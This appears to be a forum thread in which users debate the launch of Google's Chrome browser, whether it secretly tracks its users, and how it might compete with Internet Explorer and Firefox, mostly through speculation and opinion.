Just by their ability to rank search query results and knowing that most people never search beyond the first few pages gives them incredible power over the information that the billions of computer users receive. In essence, they have the ability to censor and filter what information we receive and what opinions we formulate far beyond what governments, past and present, do with their media censorship. It's part of the "control everything" process.

3 steps most people take when surfing the web:
1- Open Browser
2- Search for issue on mind
3- End up on random webpage

Google dominates searching. Google recently began dominating the content market (youtube, blogger, etc.).

Now Google is looking to have an influence over the first step too.

It all boils down to the fact that the big G feels encroached upon by MacroShaft. They want to remain competitive in the market and in order to do so, they developed Chr0m3.

I remain leery of Chr0m3 because I sincerely believe that the big G has ulterior motives. While the application is loosely based upon open-source code from W3bK1t and M0z1ll4, I don't believe for one minute that G hasn't injected some sort of tracking or monitoring capabilities regardless of their claims that the private browsing feature "incognito" mitigates the storage of cookies, history, tracking, etc.

What I do find mildly amusing is that while G has it out for MacroShaft, they aren't going to fuck with FF because they provide the main source of M0zill4's income (85% in 2006).

I personally think it'll be a failure, or at least, not measure up to Firefox or IE. Kinda like Vista with XP.

umm i read it somewhere that ie is coming up with a new version on IE... and they plan making the google toolbar uninstallable and tweak the home page...

n if they do this n put msn in its place that will be huge disadvantage for google... you must understand 70% of the ppl still use IE.. as the records suggest!

firefox controls 20% of the market n was not growing so they launched a new product so that they can eat into the IE share...

Don't you people think your paranoia is all bs? Google chrome is an open source browser so everybody could see the spyware!
Plus google is concerned about their image, so they won't install spyware because someone would find out about that and that would be a disaster for the brand.

That's what I wanted to post too.It may not have spyware in the browser itself but don't worry they left a door open .It's like co.ok.ie st.uff.ing ..you search on google for something they download an exe to your computer and voila spyware is installed.:cool2:
